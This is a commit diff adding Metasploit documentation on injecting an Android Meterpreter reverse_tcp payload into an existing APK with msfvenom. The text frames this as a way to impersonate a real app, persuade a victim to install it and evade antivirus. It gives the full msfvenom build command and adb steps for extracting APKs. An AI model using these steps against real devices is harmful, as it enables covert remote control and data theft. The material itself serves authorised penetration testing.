Land #10246, add documentation for APK injection

documentation/modules/payload/android/meterpreter/injection.md

@@ -0,0 +1,51 @@
+You can inject the Android Meterpreter into an existing APK using msfvenom. This
+will allow you to impersonate an existing application, which may make it easier 
+to convince your victim to install the APK.
+
+## Vulnerable Application
+
+It should be possible to inject Meterpreter into any APK, however some applications
+have complex resource structures which may not work with `apktool`.
+Additionally some applications have security measures that prevent the application
+from working as expected once it has been modified.
+
+**Finding APKs**
+
+There are many websites that provide standalone APK that can be downloaded, e.g:
+APKPure, APKMirror, RAW APK.
+You can also build a simple application yourself with Android Studio.
+
+Additionally you can pull APKs from a device connected via ADB:
+
+```
+$ adb shell pm list packages | grep app
+package:com.existing.app
+$ adb shell pm path com.existing.app
+package:/data/app/com.existing.app-1/base.apk
+$ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
+[100%] /data/app/com.existing.app-1/base.apk
+```
+
+## Requirements
+ 
+APK Injection (as opposed to generating a single APK payload) requires a few tools
+to be present on your command line already:
+
+* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
+* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
+* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
+
+Installing these tools (if they are not installed already) will depend on your OS.
+Apktool can be installed manually or automatically (e.g `brew install apktool`).
+keytool and jarsigner can be installed by installing the appropriate JDK.
+
+## Verification Steps
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+
+Next, start an Android device. Upload the APK, and execute it, as you would with
+a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).
+
+

documentation/modules/payload/android/meterpreter/reverse_tcp.md

@@ -41,21 +41,24 @@ msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
 msf payload(reverse_tcp) >
 ```
 
-To create the APK with msfvenom:
+### To create the APK with msfvenom:
 
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```
 
+### To inject meterpreter into an existing APK with msfvenom:
+
 You can also add Android meterpreter to any existing APK. This will make it harder for
 Anti-virus software to detect the payload, and allow you read internal files and take
-screenshots of the Android app you are backdooring:
-
+screenshots of the Android app that you are backdooring:
 
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```
 
+[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md).
+
 
 Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
 so please refer to the Scenarios section for more information.